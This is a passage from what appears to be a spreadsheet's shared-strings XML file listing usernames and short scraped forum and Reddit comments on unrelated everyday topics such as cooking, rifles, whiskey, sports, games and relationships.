    <t>No problem! You deserve a compliment for your progress</t>
  </si>
  <si>
    <t>&gt;&gt;110798673 &gt;Supergirl is jealous of Power Girl's breasts &gt;Supergirl grabs some Red Kryptonite and hopes it will grow her breasts &gt;Supergirl's breasts grow, but everything else grows even more (especially the muscles) &gt;She-Hulk is feeling shy and having trouble clubbing because she stands out so much &gt;Wasp zaps herself with Pym Particles to make herself She-Hulk-sized, so She-Hulk won't be the only one sticking out &gt;some sticc insta-thot berates them for some stupid reason &gt;Wasp blasts the thot with Pym Particles until she's bigger than the two of them combined &gt;&gt;110799033 Something original... something original... okay... &gt;scrawny girl works out while imagining somewhat-fit Anon &gt;"I can't wait to see Anon again! He'll think it's so cool that I've started working out too!" &gt;scrawny girl has developed some muscles, but her imaginary Anon has developed even more &gt;"He's going to be so impressed with the progress I've made! Anon's mind is going to be blown!" &gt;scrawny girl is now brawny girl, but her imaginary Anon keeps getting bigger too &gt;"Any day now, Anon is gonna flip when he sees me! This'll be the best reunion ever!" &gt;scrawny girl is now enormous and absolutely dwarfs Anon, who hasn't improved at all since the beginning of the comic &gt;"Um... hi!"</t>
  </si>
  <si>
    <t>WinkysTeatowel</t>
  </si>
  <si>
    <t>I’d agree, sieving the icing sugar is essential.</t>
  </si>
  <si>
    <t>Claire</t>
  </si>
  <si>
    <t>ABOUT US We are a small family run Café situated 1.5 hours south of Perth within the Peel Region of WA. Our committed team take pride in the food, coffee and service we provide to the local people of the town and the many visitors we welcome daily. We strive for excellence on every platform and cherish the loyalty of our employees. ABOUT THE ROLE We are looking for a Chef to join our team, employed on a casual basis. Typically your working week will be 4 or 5 days with a varying roster to accommodate alternative weekends off (no split shifts and no evenings). In this fast-paced role, you will assist the head chef in the preparation and cooking of all menu items including breakfasts, filled wraps, sandwiches &amp; rolls, a wide range of burgers, toasted sandwiches, light meals, cakes, and pastries. Your genuine passion for imaginative and quality food will be contributed to our weekly specials including catering for gluten free and vegan dietary requirements. OUR IDEAL CANDIDATE WILL Be qualified with minimum three years’ experience in a similar role, &gt; Have experience with fast paced breakfast, &gt; Be able to multitask food preparation with preparing orders as they come in, &gt; Demonstrate impeccable time management and communication skills, &gt; Be a solid team player, and also be able to independently using initiative, &gt; Be able to supply your own uniform and have access own car/transport, &gt; Have a hard working, can do attitude and will go the extra mile for the good of the team. OTHER INFO The successful candidate will be offered a competitive hourly rate and the opportunity to work in the beautiful bush land of Western Australia. Our ideal candidate will demonstrate excellence, exceed service standards and customer expectations. Accommodation may be available for the initial settling in period if the successful candidate is willing to travel for the position. To apply, please send your resume to rec*</t>
  </si>
  <si>
    <t>smaffit</t>
  </si>
  <si>
    <t>I thought it was a CIA flag</t>
  </si>
  <si>
    <t>HollywoodSX</t>
  </si>
  <si>
    <t>Defiance action (Tenacity or Deviant Tactical) will serve you well. I'd go 6.5 Creedmoor for greater factory ammo options (6 Creed is rapidly improving, though) and better barrel life. 300PRC isn't a PRS cartridge. As others have said, chassis vs stock is personal preference. I run a chassis, and I've never been able to get full comfortable behind a more traditional style stock for whatever reason. For PRS, gear isn't as big of a deal as many people make it out to be, but it can be a (useful) crutch when starting out. A good rifle and optic, a good way to run data for your rifle and ammo (A phone app and WeatherFlow meter or a Kestrel), a good positional bag (Gamechanger or Pint Size Gamechanger, both of which can also be used as a rear bag), and good quality ammo is all you really need to get started. Once you start shooting matches, you'll rarely find yourself in a situation where you can't borrow gear from other shooters and try it out. Also, be prepared for a lot of struggles if you take a 14.5" 5.56 AR to a PRS match, even a 1 day match. Gas guns are tricky to begin with, and the types of ammo you'll have to run in a 5.56 gasser will really limit you compared to what's possible with a bolt action.</t>
  </si>
  <si>
    <t>CloverHoneyBee</t>
  </si>
  <si>
    <t>Honeycomb Cheese Cake with Fresh Figs &amp; Concord Grapes (I slaved over a hot oven for forever!)</t>
  </si>
  <si>
    <t>havingfun89</t>
  </si>
  <si>
    <t>The metric is so low that almost by default it is.</t>
  </si>
  <si>
    <t>harleyquinnical</t>
  </si>
  <si>
    <t>So...who's "safe banker" just shiat the bed?</t>
  </si>
  <si>
    <t>Antparry92</t>
  </si>
  <si>
    <t>Cadey Quote: : » Quote: : » Told you to go for Walcott 😉 Good weekend too, hopefully good rewards coming!! Need to promise me you’ll take Wij if given a choice!! I’ve not looked at the predictions so can’t make that promise Quote: : » How are you still grinding it out?! You mean the WL In general or G1 The game in general</t>
  </si>
  <si>
    <t>mountshion</t>
  </si>
  <si>
    <t>You can also listen to your customers! Be clear that you don't love them (while hopefully acquiring some kind of taste for them - I don't love wheat ales but I try to be able to tell a good one from a shit one), and ask your regulars what they'd like to see?</t>
  </si>
  <si>
    <t>ricky1370</t>
  </si>
  <si>
    <t>Reading you say Larceny tasted like ethanol and bitter - for most the biggest issue getting into whiskey is getting in top of the alcohol content. For me it was a matter of forcing myself to drink higher proof whiskeys (with ice initially). The faster you build up a proof tolerance, the faster you'll be able to appreciate more styles of whiskey without the roughness being a barrier. For now though, as mentioned by others something like the Knob Creek small batch (50%) would be a good stepping stone up to the barrel proofers like bookers or Stagg Jr. Might be worth starting on scotches even, as they tend to be much fuller flavoured at lower proofs. I quite enjoy maker's mark and bulleit in the 90 proof cheap American Whiskey category.</t>
  </si>
  <si>
    <t>Ken5336</t>
  </si>
  <si>
    <t>You not for visible, why are you even around anything that has to do with visible. You not stopping nothing at all. Keep your talking points with buddy's going</t>
  </si>
  <si>
    <t>TenaciousBe</t>
  </si>
  <si>
    <t>Fantastic description, maybe the best I've ever seen. Beautiful!</t>
  </si>
  <si>
    <t>JoseFcoRosado</t>
  </si>
  <si>
    <t>Well, I really don't know what people expect especially when kojima said all the time that this game is very hopeful. It is not a dark or horror or sinister game.</t>
  </si>
  <si>
    <t>MasterHollick</t>
  </si>
  <si>
    <t>That’s was the worst feeling as a kid.</t>
  </si>
  <si>
    <t>liehon</t>
  </si>
  <si>
    <t>Tried to check if I had a downvote to retract but couldn't find the comment in question. Got a link?</t>
  </si>
  <si>
    <t>ThatAlphaMaleDude</t>
  </si>
  <si>
    <t>Hey all, I have recently broken up with my ex, we were not dating very long. I do how ever have a thing for her sister who is a couple of years older. What do you think is the best way to approach this? I feel like I have 2 options Option 1: Change my number, and use my middle name. Happen to bump in to her sister and start dating. Tell her 6 months down the line I used to date her sister. Or Option 2: Ask my ex for her sisters number? What is the best way to go about this TL:DR Dated a girl for a month or so, I ended things as it wasnt working for me. I fancy her sister, and want to date her Should I ask my ex for her sisters number or just date her sister with out telling here who I am</t>
  </si>
  <si>
    <t>AkirIkasu</t>
  </si>
  <si>
    <t>The problem, as I have been told, is that friends can also be a reason to drink.</t>
  </si>
  <si>
    <t>AcuteGryphon655</t>
  </si>
  <si>
    <t>Still seems to be dying down quite a bit, so that's good</t>
  </si>
  <si>
    <t>MasterCookSwag</t>
  </si>
  <si>
    <t>Why would that be the case? Carry trades from rate disparities is creating a much larger demand for dollars.</t>
  </si>
  <si>
    <t>pc_master_baits_</t>
  </si>
  <si>
    <t>Unless I'm wrong because that first study would require a lot of time to thoroughly read, it is the effect exercise has on weight loss vs being sedentary. Can you highlight any parts where they did this in trained individuals who are not obese and had them, track and equate calories?</t>
  </si>
  <si>
    <t>KingPopcornHead</t>
  </si>
  <si>
    <t>Haha same bro, binocs are gonna be whack but keen as fuck for the atmosphere, never been to a live fight before.</t>
  </si>
  <si>
    <t>IrishStarr</t>
  </si>
  <si>
    <t>@Ipfan437 is correct. Law enforcement officers are supposed to be in fear of their life, or the life of someone else, before pulling their weapon. If they follow that rule then they can’t shoot to wound. You have seconds to decide what to do and assessing whether to wound, or not, is another decision a LEO has to make in seconds. Officers are trained only to shoot to kill. I can’t speak for Amber, but it probably didn’t occur to her to shot to wound. As a LEO I want to know why she didn’t notice the furniture, pictures etc were unfamiliar as soon as she walked in to the home?</t>
  </si>
  <si>
    <t>CASchoeps</t>
  </si>
  <si>
    <t>&gt; That's not how it works. They have sold ships so they have to create gameplay for them. I'm not saying they will never do that, but "adding gameplay" already is done once they program the code that makes you able to deploy mines. That is in no way a mission. That's not saying there never will be some, but I hope they are reasonable enough to check what is needed more in order to spend their resources properly. &gt; There are not going to spend 1000s of man-hours building a ship and then have no missions for it which is quite easy to do in comparison It's different people though, and it feels as if they do not have enough game play programmers in the first place. Someone has to code "was the dropped mine within the specified area or not?" and it's not the guy who paints the walls. And I'd rather see that guy working on ship docking, permanent persistence or something like that before he tackles a task that only a few can benefit from. Once everything works they can start working on niche tasks like mine laying missions or space weed growing.</t>
  </si>
  <si>
    <t>B-Ribbit</t>
  </si>
  <si>
    <t>Totally. And yes its all just poorly done plastidip. Should come off no prob, but I don't know the shape of the chrome under all of it. Here's hoping its good! I should have some update pics in a few weeks when I get a few things off my life plate</t>
  </si>
  <si>
    <t>WhatIsThisBot</t>
  </si>
  <si>
    <t>You have been given one point for this answer. Thanks for contributing! ^^^Ocramovic ^^^awarded ^^^to ^^^VSPinkie ^^^\(16\)</t>
  </si>
  <si>
    <t>Embarrassinghuman</t>
  </si>
  <si>
    <t>Please post in the Avatar Megathread: https://www.reddit.com/r/bisexual/comments/dj4c9q/avatar_megathread</t>
  </si>
  <si>
    <t>56type</t>
  </si>
  <si>
    <t>OP....IIRC it takes something like 3 tons of force to set a rivet. I SERIOUSLY doubt you're capable of generating that much force without a concerted effort on your part and some leverage or a tool of some type.</t>
  </si>
  <si>
    <t>mcrabb23</t>
  </si>
  <si>
    <t>This is some BS right here. Acetone will strip pretty much anything off of anything. Just don't use it on plastic</t>
  </si>
  <si>
    <t>&gt;&gt;73168158 So you actually enjoy scanning the goods? Then your analogy makes sense. I don't like scanning the goods, it's tiresome. I choose the easiest option, I let someone else do it for me.</t>
  </si>
  <si>
    <t>Frigidevil</t>
  </si>
  <si>
    <t>Haha nah I'm talking about how his stick breaking gave Goose an easy goal.</t>
  </si>
  <si>
    <t>Stats_Sexy</t>
  </si>
  <si>
    <t>First time I’m seeing this. What the hell?</t>
  </si>
  <si>
    <t>csspecs</t>
  </si>
  <si>
    <t>Quote: : H I just scrub them with a wire brush and a little oil. If the spots come back I’ll do it again. This, and if you want to go a little further, at any hardware store they sell a product called rust neutralizer, rust reformer or ospho, basically just phosphoric acid. It turns rust back into iron. So just dab a little on the spot and let it dry, Scrub clean and oil. The coke trick kinda works but your generally paying for a lot of water and sugar which is not useful the concentration of phosphoric acid in soda is kinda small.. Actual phosphoric acid is what you want and it is actually fairly cheap compared with soda and is very useful. It keeps pretty much forever, I've had the same gallon jug of the stuff in the shop for like a decade.. If your not doing equipment repairs all the time just buy a little bottle from a hardware store.. $5-6 will do everything you want and you'll probably have the same bottle 10 years from now and use it every few months.</t>
  </si>
  <si>
    <t>Supergaz</t>
  </si>
  <si>
    <t>It's addiction for getting high. Get off dopamine boosters before you spiral into cross addiction</t>
  </si>
  <si>
    <t>Nomekop777</t>
  </si>
  <si>
    <t>I was on [this post] (https://www.reddit.com/r/grammar/comments/dfg90u/can_anyone_explain_me_the_line_underlined/?utm_medium=android_app&amp;utm_source=share) in r/grammar, complaining about a poorly worded sentence. I broke it down for OP, and someone complimented how I did it. I said that I wondered if there was a language that treated sentences like an algebraic equation (where you have variables, then define them elsewhere), and someone linked me to the Wikipedia page. It said there was a subreddit, so now I'm here. I know nothing about this other than what I read on Wikipedia, but it seems really cool.</t>
  </si>
  <si>
    <t>&gt;&gt;13503258 You only look 25 lol &gt;&gt;13503262 The body is an energy saving mechanism. Your body doesnt give you any more energy than you're using in that moment. You only have the energy to work out after you start...</t>
  </si>
  <si>
    <t>Bennybop</t>
  </si>
  <si>
    <t>billybongo: ↑ Just unreal. A 50kwh batt for 5-7 grand? How come a tiny by comparison (13kwh) wall mount batt (tesla powerwall) for your home costs about 8 grand plus fitting? Hmmm very interesting. Expand dunno, maybe Elon was talking shite, or they have some big mark ups on the wall batts??</t>
  </si>
  <si>
    <t>SuperEnthusiastic</t>
  </si>
  <si>
    <t>I have had that happen too. They say nothing and let problems continue for weeks and then there is a big explosion and it's all over. Very annoying when it would have been easier to talk about it early</t>
  </si>
  <si>
    <t>swiftv</t>
  </si>
  <si>
    <t>Really appreciate the attempted eli5. Rossby waves are a neat phenomenon to learn about.</t>
  </si>
  <si>
    <t>Lee R</t>
  </si>
  <si>
    <t>" What I ordered did not help my wife achieve an orgasm, which was disappointing based on the reviews I read on your website...so not exactly satisfied with my purchase...not sure I will purchase again from your Website. Thanks, Lee Rourk "</t>
  </si>
  <si>
    <t>thisisforyall</t>
  </si>
  <si>
    <t>What comment says to stop using the internet if you’re not American</t>
  </si>
  <si>
    <t>ai_jobs</t>
  </si>
  <si>
    <t>Airbnb has become a global platform that connects travelers and hosts from over 81,000 cities. As such, experimentation is core to our growing business. We want to take a scientific approach to decision-making through careful … Read more / apply: https://ai-jobs.net/job/data-scientist-inference-trust/</t>
  </si>
  <si>
    <t>OwenSixteen</t>
  </si>
  <si>
    <t>asking for credit for a win doesn't depend on running away with it. You don't get an extra win for beating a team by more than a touchdown</t>
  </si>
  <si>
    <t>crackanape</t>
  </si>
  <si>
    <t>It's in Malaysia. Malayam is an Indian language which has virtually zero relationship to Bahasa Melayu which is what the announcer was speaking.</t>
  </si>
  <si>
    <t>BeerDrinkingWeather</t>
  </si>
  <si>
    <t>Those retards gonna get sued lmao</t>
  </si>
  <si>
    <t>dawnzy</t>
  </si>
  <si>
    <t>Love the idea, don't those alarms drive you nuts when you hear em go off a lot ?</t>
  </si>
  <si>
    <t>unimpeccable</t>
  </si>
  <si>
    <t>Disappointed to find no references to "Master of Disguise" in a turtle thread</t>
  </si>
  <si>
    <t>hahaedgyequalfunny</t>
  </si>
  <si>
    <t>I can see a lot of people in that sub unironically saying "gamers rise up".</t>
  </si>
  <si>
    <t>IMA START SCREAMIN'</t>
  </si>
  <si>
    <t>kozakandy17</t>
  </si>
  <si>
    <t>Lots of responsibility likely getting shifted to EQ/RS presidencies so Bishop can focus on youth.</t>
  </si>
  <si>
    <t>Pickles256</t>
  </si>
  <si>
    <t>That's a great idea. Make it a OT map for GA or CS and then make a HvV map for the PT era</t>
  </si>
  <si>
    <t>&gt;&gt;11032542 Brapp* "Basic feels on anal sis" "A van and shed: real anal sis"</t>
  </si>
  <si>
    <t>dicaparly</t>
  </si>
  <si>
    <t>That’s impressive. Although those lane assist things are notoriously bad and will go off over nothing. I had one at SRT and every few minutes I hit the mute button because it would fucking go off nonstop just by driving down the road. That gate story sounds like a good one, though. Gates always seem to be the most fun to hit according to my coworker.</t>
  </si>
  <si>
    <t>poorguy14</t>
  </si>
  <si>
    <t>If you paid attention to anything maybe you'd know he's a troll and the most downvoted reddit user on purpose</t>
  </si>
  <si>
    <t>rebelgato</t>
  </si>
  <si>
    <t>What's the name of the game?</t>
  </si>
  <si>
    <t>DLt724</t>
  </si>
  <si>
    <t>tickets to go see my fav band</t>
  </si>
  <si>
    <t>a-mom-ymous</t>
  </si>
  <si>
    <t>If your work hours are flexible and you can wear your baby while you care for your animals, then you can probably make it work. You’ll want to work while baby is napping, but it’s hard to predict when and how long they’ll sleep. Once baby isn’t napping as much, you may need to hire someone to care for them while you’re working. It will allow you to focus on your work instead of dealing with constant interruptions.</t>
  </si>
  <si>
    <t>Kenny_Letterman</t>
  </si>
  <si>
    <t>It is because the flu virus is a very large group of very distinct viral groups that are separated by literally hundreds of millions of years of evolution. Two different flu viruses can be as genetically distinct from each other as you are from a mouse. And to make it even more complicated, they can undergo horizontal gene transfer as well as vertical, which would be kind of like you and a mouse exchanging a couple of genes. Because they have so much diversity and because they can transfer genes horizontally, each year they can be absolutely radically different.</t>
  </si>
  <si>
    <t>amoebaD</t>
  </si>
  <si>
    <t>Actually she has a constitutional amendment as part of her platform, but then she also has a lot of other great ideas that can be achieved without it. Including lifetime ban on lobbying for former elected officials which I see Bernie has also adopted. This is just at first glance, haven’t had time to go through the new bill yet. So he’s copying Warren then right? That’s a mortal sin to some people. Sorry for the snark, the Warren bashing on thin insulations has been really bothering me lately. Especially coming from people who seemingly don’t know a thing about her except the attacks coming from TYT and the like.</t>
  </si>
  <si>
    <t>oximaCentauri</t>
  </si>
  <si>
    <t>Here's what I imagined Bus ride going normally-&gt; driver says it's their first day-&gt; people get off the bus</t>
  </si>
  <si>
    <t>piscator</t>
  </si>
  <si>
    <t>Hi 908, That?s very interesting. Is it just the M5 that commands those $30k prices or would an equally clean, equivalent year 535i sell for similar dollars? I did some searches directly through CL and that worked much better! I?m guessing that the consolidated search engines like ?AutoTempest? are more interested in feeding you listings they can make money on than carefully sifting through CL for you. I'm giving up on 'AutoTempest' in favor of your method! I?m getting more excited and more committed to this project. I don?t need to rush into it, but the more I ponder it, the more I think it?s a good ?next project? for me. Also, the car my daughters use when they're home is shot. The extra car is not essential, but it is helpful when they?re around.</t>
  </si>
  <si>
    <t>henchman3G</t>
  </si>
  <si>
    <t>Yes. Brad. You're right. Good job!</t>
  </si>
  <si>
    <t>DennisRodbuster</t>
  </si>
  <si>
    <t>I think Bryan is a good consensus one after WM28</t>
  </si>
  <si>
    <t>nukajm</t>
  </si>
  <si>
    <t>I prefer to call it the Republican Democratic Coalition.</t>
  </si>
  <si>
    <t>ComedyDiv</t>
  </si>
  <si>
    <t>Interesting idea that someone with such a low IQ could start an anarchist movement by accident. I think it's closer to reality than some mastermind orchestrating chaos.</t>
  </si>
  <si>
    <t>AskTrumpSupporters is a Q&amp;A subreddit dedicated to better understanding the views of Trump Supporters, and why they have those views. **For all participants:** * [FLAIR](https://www.reddit.com/r/AskTrumpSupporters/wiki/index#wiki_flair) **IS REQUIRED BEFORE PARTICIPATING** * **BE CIVIL AND** [SINCERE](https://www.reddit.com/r/AskTrumpSupporters/wiki/postingingoodfaith) * **REPORT, DON'T DOWNVOTE** **For Non-supporters/Undecided:** * **NO TOP LEVEL COMMENTS** * **ALL COMMENTS MUST INCLUDE A CLARIFYING QUESTION** **For Trump Supporters:** * [MESSAGE THE MODS](https://www.reddit.com/message/compose?to=%23AskTrumpSupporters⊂ject=please+make+me+an+approved+submitter&amp;message=sent+from+the+sticky) **TO BE ADDED TO OUR WHITELIST** Helpful links for more info: [OUR RULES](https://www.reddit.com/r/AskTrumpSupporters/wiki/index#wiki_rules) | [EXCEPTIONS TO THE RULES](https://www.reddit.com/r/AskTrumpSupporters/wiki/index#wiki_exceptions_to_the_rules) | [POSTING GUIDELINES](https://www.reddit.com/r/AskTrumpSupporters/wiki/index#wiki_posting_guidelines) | [COMMENTING GUIDELINES](https://www.reddit.com/r/AskTrumpSupporters/wiki/index#wiki_commenting_guidelines) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskTrumpSupporters) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>addicted-to-nerds</t>
  </si>
  <si>
    <t>Uh wow big question. I learned I was gonna move and I decided not to go out with someone bc I knew we would have to break up soon. I kinda wish I’d have went for it.</t>
  </si>
  <si>
    <t>RagingIce</t>
  </si>
  <si>
    <t>Does TSN truly think that Rod is good at his job? CFL should have made his firing contingent on the next tv contract</t>
  </si>
  <si>
    <t>Saxon78</t>
  </si>
  <si>
    <t>No , they won't https://www.wheel-size.com/ 2008 Fiat Panda mk2 1.1 2013 Fiat Panda mk3 1.2 2014 Alfa Romeo Giulietta 1.4 MultiAir</t>
  </si>
  <si>
    <t>Books_and_Cleverness</t>
  </si>
  <si>
    <t>I personally have always been a Goff skeptic (at least among Rams fans) and didn't want him to get a huge contract. But serious question, have you actually seen Goff play more than yesterday's game? And your takeaway was that he was the problem, as opposed to the O-line and run game being bad or mediocre? I feel like I'm taking crazy pills. IMHO Goff has had some big turnovers--many of which are really not his fault--but the real difference is up front where the team used to be dominant and now is pedestrian. On top of that, Talib and Matthews and Gurley were all injured yesterday. Even with that, Rams offense narrowly failed a couple 4th down conversions and Malcom Brown fumbled on the opening drive the second half. Otherwise even that game might have been different.</t>
  </si>
  <si>
    <t>FezzikTheFreak</t>
  </si>
  <si>
    <t>Yeah, he's only a top 20 passer right now but he's only started 12 NFL games and he's only 22.</t>
  </si>
  <si>
    <t>joko104</t>
  </si>
  <si>
    <t>Originally Posted by jaeger19 No..you POSTED.. that you took your guns to a "premier gun range". Not odd for an anti gunner that wants to try to portray himself as a gun owner. Honestly Vegas.. if you were a gun owner... I would strongly suggest that you either NOT be a gun owner and sell whatever firearm your Dad or Mom left you... or you go get some serious firearms training. Because frankly.. .looking at all your posts... you are not safe to be a gun owner.. your knowledge of firearms.. people and safety is so lacking.. that you are unsafe to use a firearm. I'm not convinced what he posts online is always consistent with his real self and real opinions. He does a lot of hyperbole and devil's advocate type messages. However, his messages about gun usage purposes are possibly reasons for concern.</t>
  </si>
  <si>
    <t>throwaway4fun92</t>
  </si>
  <si>
    <t>My odd schedule can lead to a few weekdays where I'm off, and today is one of those days. I'm a 27 year old guy who would be able to host this afternoon for the right woman. Ideally we could get to message and know a little bit about each other first. Most important thing for me is that both of us are comfortable. I'm ddf, don't smoke and live in the Winter Park area. If you're interested or have any questions feel free to reach out as it doesn't necessarily have to be for today either.</t>
  </si>
  <si>
    <t>Alejandro4891</t>
  </si>
  <si>
    <t>once or twice and then i just keep it for myself. even if the pitch wasn't accepted, i leave it as proof that i can write about X subject, just in case i need a sample at a later time.</t>
  </si>
  <si>
    <t>Gundam_Greg</t>
  </si>
  <si>
    <t>Bloody crow of Cainhurst but he can show up at anytime during the game, even when you’re fighting another boss.</t>
  </si>
  <si>
    <t>taisun93</t>
  </si>
  <si>
    <t>tbf there was a well established track record of Hollywood letting pedos off the hook</t>
  </si>
  <si>
    <t>beno623</t>
  </si>
  <si>
    <t>Is the headache just from drinking or did I slam my head on something, man’s greatest question</t>
  </si>
  <si>
    <t>BattleofBattles</t>
  </si>
  <si>
    <t>Melancholy because its fun to say plus relatable</t>
  </si>
  <si>
    <t>official_fox_news</t>
  </si>
  <si>
    <t>Joke is on them. I have twitch and I have Prime, but I don't have any friends.</t>
  </si>
  <si>
    <t>Qrispy_</t>
  </si>
  <si>
    <t>Wife and kids got to choose the dog's costume this year.</t>
  </si>
  <si>
    <t>Bergy21</t>
  </si>
  <si>
    <t>I used to live in DC and this was before podcasts were huge so I would listen to them every morning on my way to work. Kind of threw me for a nostalgia loop because that was 7-8 years ago.</t>
  </si>
  <si>
    <t>Kronos_001</t>
  </si>
  <si>
    <t>The only thing these guys had was their originality in naming and renaming schemes. Now even that is gone.</t>
  </si>
  <si>
    <t>Danland</t>
  </si>
  <si>
    <t>Do you have someone there with you. Just try an take deep breaths and try to clam down. I Kno that's not easy to do but please try</t>
  </si>
  <si>
    <t>spoiledandmistreated</t>
  </si>
  <si>
    <t>I miss Tom Petty something fierce.. I have a tattoo of him on my back I had done over 20 something years ago... even entered it in a tattoo competition and came in second... lost to Stevie Ray Vaughan...</t>
  </si>
  <si>
    <t>IJustMadeThisForCS</t>
  </si>
  <si>
    <t>A pic me and my cousin got on a bridge above I-95</t>
  </si>
  <si>
    <t>Galiett</t>
  </si>
  <si>
    <t>Before restarting on a new account, I also cleared Add dungeon like that. Took me a bit over 4 minutes, but under 5. I didn't have third class. Now I'm on Iron Paladin, moving up the story quests to make my Elrianode set before gunning for Comet Crusader. Chugging MP pots is a fair price to pay for feeling like the most amazing tank, but I will never forget that crazy MP sustain.</t>
  </si>
  <si>
    <t>Alphonse__Elric</t>
  </si>
  <si>
    <t>Did Djokovic alter his serve a bit or is it just me. His follow through after striking the ball on his serve seems different to me.</t>
  </si>
  <si>
    <t>a_manioc</t>
  </si>
  <si>
    <t>I sat at the old swing chair for hours that day, allowing the loud screeching noise to silence my troublesome thoughts, the cheap cigarettes also helped, beyond the crumbling house’s porch i saw destruction, empty houses, broken windows and blood, so much blood. Ever since the catalyst took place in 2027 the government decided no one else should have to bear the envisioning of such horrors and ever since parents have been allowed to take their babies sight at birth, lucky babies. Now at 90 i could finally join them in their blissful ignorance, i could allow a car to run me over and be as free of guilt as the driver, bliss my faith has deprived me of until now. Years of reading in the dark secretly were now worth it, and who would have stopped me from ruining my eyes in purpose? There was no law, people ever did these days was die gruesome deaths and fuck, in hope of saving humanity from oblivion. I suppose i could have tried to save them or stopped my loved ones from plunging their bodies into the ocean, but what kind of monster would i be if i kept them from salvation, i rest assured that Jesus will forgive them for their sin. My whole face morphs into pure bliss as the world becomes fuzzy, then as dark as the storms that ravage the earth, my mind slowly forgets the very memory of the color red, as it has forgotten the days without it, and as my cigarette falls to the ground a long lost face of fierce red hair and sparkling blue eyes lulls me to sleep.</t>
  </si>
  <si>
    <t>berek001</t>
  </si>
  <si>
    <t>I enjoy pizza regularly and I have tried all the major names, but Papa Johns is the best tasting and consistent quality pizza you’ll get around here. The order is always right on, arrives hot, and on time! Don’t bother with all those other ‘wannabe pizza makers’.</t>
  </si>
  <si>
    <t>**Welcome to the Prompt!** All top-level comments must be a story or poem. Reply here for other comments. **Reminders**: &gt;* Stories at least 100 words. Poems, 30 but include "[Poem]" &gt;* Responses don't have to fulfill every detail &gt;* See [Reality Fiction](https://www.reddit.com/r/WritingPrompts/search?q=flair%3A\(Reality+Fiction\)&amp;restrict_sr=on&amp;sort=new&amp;t=all) and [Simple Prompts](https://www.reddit.com/r/WritingPrompts/search?q=flair%3A\(Simple+Prompt\)&amp;restrict_sr=on&amp;sort=new&amp;t=all) for stricter titles &gt;* [Be civil](https://www.reddit.com/r/WritingPrompts/wiki/rules#wiki_rule_10.3A_be_civil) in any feedback and follow the [rules](https://www.reddit.com/r/WritingPrompts/wiki/rules) [](#icon-help) [^(What Is This?)](https://www.reddit.com/r/WritingPrompts/wiki/off_topic) ^• [](#icon-information) [^(New Here?)](https://www.reddit.com/r/WritingPrompts/wiki/user_guide) ^• [](#icon-help) [^(Writing Help?)](https://www.reddit.com/r/WritingPrompts/wiki/index#wiki_writing_resources) ^• [](#icon-exclamation) [^(Announcements)](https://www.reddit.com/r/WritingPrompts/wiki/announcements) ^• [](#icon-comments) [^(Discord Chatroom)](https://discord.gg/js5XDFB) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/WritingPrompts) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>cabspaintedyellow</t>
  </si>
  <si>
    <t>This belongs in the Survivor Hall of Fame.</t>
  </si>
  <si>
    <t>EndVry</t>
  </si>
  <si>
    <t>It looks like she got a laceration on her left forearm.</t>
  </si>
  <si>
    <t>ArseneLupinIV</t>
  </si>
  <si>
    <t>Shia LaBeouf said something similar on the Hot Ones when he was asked about his viral freestyle video. Apparently a lot of actors practice freestyling in their spare time to keep their minds sharp.</t>
  </si>
  <si>
    <t>GetsItAllWrong</t>
  </si>
  <si>
    <t>Doesn't mean he goes around telling tales about it</t>
  </si>
  <si>
    <t>haleycole</t>
  </si>
  <si>
    <t>There are soooo many to choose from, I’m just curious as to who has tried a few of them and what they thought about them? Kind of thinking about doing it for my boyfriend for Christmas.</t>
  </si>
  <si>
    <t>jtkd4192</t>
  </si>
  <si>
    <t>Interested! What do I need to do?</t>
  </si>
  <si>
    <t>imsowfresh</t>
  </si>
  <si>
    <t>Semi shotgun, impact grenade and console awareness. What else can i say ?</t>
  </si>
  <si>
    <t>&gt;&gt;481845009 The irony in this post</t>
  </si>
  <si>
    <t>porntipsguzzardobot</t>
  </si>
  <si>
    <t>Hey /u/wlgb4, [Your post](/r/memes/comments/dhw3i9/dark_mode_is_and_always_has_been_superior/) has been removed. &gt;**DO NOT FLOOD THE QUEUE.** Limit of 5 posts in a 24 hour period You will be able to create a new submission in 6.43 hours ------------------------------------------------------------------------------------- ^Bleep ^bloop, ^I ^am ^a ^bot.</t>
  </si>
  <si>
    <t>Worthyness</t>
  </si>
  <si>
    <t>yeah most people think it's "all might is pointing to someone who can totally be the #1 hero." and not a literal successor</t>
  </si>
  <si>
    <t>MiloTheCuddlefish</t>
  </si>
  <si>
    <t>He's denying he took it, and his family thinks I owe them money, which is laughable really. I have plenty of evidence to say he did take money from me. How would this fit in to a civil claim involving the dog?</t>
  </si>
  <si>
    <t>Pierogi-to-zycie</t>
  </si>
  <si>
    <t>Low effort troll.</t>
  </si>
  <si>
    <t>DragonSlayr4141</t>
  </si>
  <si>
    <t>Oooooooh, I thought you meant someone else had taken the content out of it like in a physical copy and that's why it was discounted</t>
  </si>
  <si>
    <t>smartiehaze</t>
  </si>
  <si>
    <t>People who watched pulp fiction and people who didn't. They are so different in many other ways.</t>
  </si>
  <si>
    <t>MummyCroc</t>
  </si>
  <si>
    <t>F/30/5'10" SW: 75kg CW: 68.6kg 1st goal (completed) - Get to 70kg which was the weight I was 4 weeks after giving birth to baby number 2 this January 2nd goal - Get to 68kg which is the weight I was when I got pregnant with baby number 2 3rd goal - Get to 66kg which is the weight I was when I got pregnant with baby number 1 4th goal - Get to 64kg which was the weight I was when I met my husband 5th goal - Get to 60kg and maintain from there. This was my weight when I graduated from uni in 2012</t>
  </si>
  <si>
    <t>claymountain</t>
  </si>
  <si>
    <t>Nah not rootbound at all. Those shoots are just the babies coming up. It likes to be a little bit rootbound, and it will produce even more babies when it is.</t>
  </si>
  <si>
    <t>brokenshoulders</t>
  </si>
  <si>
    <t>I second this! The piedmont chicken biscuit with bacon, cheese and a fried egg is possibly the best sandwich I’ve ever had.</t>
  </si>
  <si>
    <t>scottg1089</t>
  </si>
  <si>
    <t>If carson actually fumbled theres no way he gets close to 27 Carrie's in a pretty important divisional game</t>
  </si>
  <si>
    <t>HiroSenpaii</t>
  </si>
  <si>
    <t>They have a strong formation that allows them to grow. There are teams that have a certain ceiling and it is hard to get over it for them and thats okay. But mouz isnt even close to being there. There is so much room for individual improvement from frozen, woxic, ropz. In time they will be much much better than they already are. Mouz is one of the lucky teams who actually have a good working igl and are able to fill the roles well in a way where everybody is happy.</t>
  </si>
  <si>
